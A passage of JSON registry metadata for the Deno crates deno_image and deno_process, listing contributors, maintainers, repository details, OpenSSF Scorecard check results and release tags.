43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-01-05T13:06:42.365Z","updated_at":"2026-01-05T13:06:42.365Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-01-05T13:06:42.448Z","updated_at":"2026-01-05T13:06:42.448Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11268548,"name":"deno_process","ecosystem":"cargo","description":"Subprocess APIs for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":72,"first_release_published_at":"2025-01-15T11:23:39.535Z","latest_release_published_at":"2026-08-06T11:46:45.496Z","latest_release_number":"0.72.0","last_synced_at":"2026-08-29T21:57:49.883Z","created_at":"2025-01-15T11:32:30.986Z","updated_at":"2026-08-29T21:57:49.883Z","registry_url":"https://crates.io/crates/deno_process/","install_command":"cargo install deno_process","documentation_url":"https://docs.rs/deno_process/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"202